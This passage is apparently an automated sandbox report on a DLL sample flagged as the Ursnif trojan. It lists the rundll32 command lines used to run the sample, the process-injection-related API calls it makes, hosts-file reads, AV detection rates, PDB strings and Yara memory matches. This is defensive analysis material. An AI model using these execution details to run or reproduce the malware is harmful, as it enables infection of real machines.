                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E773CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E75B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E76A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E74E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E74ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E74ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7115C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7113B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7123D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03035D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303B149 NtQueryVirtualMemory,
                      Source: m87xfb63XU.dllVirustotal: Detection: 18%
                      Source: m87xfb63XU.dllReversingLabs: Detection: 22%
                      Source: m87xfb63XU.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER933.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@16/7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03034A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4596
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4668
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4348
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: m87xfb63XU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: m87xfb63XU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.515702652.00000000052D6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542683798.0000000004EA1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb1 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb4 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbHa source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb) source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.533606421.0000000000D92000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.553574266.0000000000832000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.568560433.0000000000C92000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbt source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbH source: WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb? source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK` source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb& source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbM source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.542799224.000000000311B000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbk source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb* source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbKi source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb2 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb\ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbh source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbh source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.697038895.000000006E78B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.698211502.000000006E78B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbz source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb, source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbn source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.542852774.0000000003121000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E712150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7121A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E74AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E74AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_029FC806 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_029FC857 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0027BFA4 push esp; retn 0027h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0027C330 push esp; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
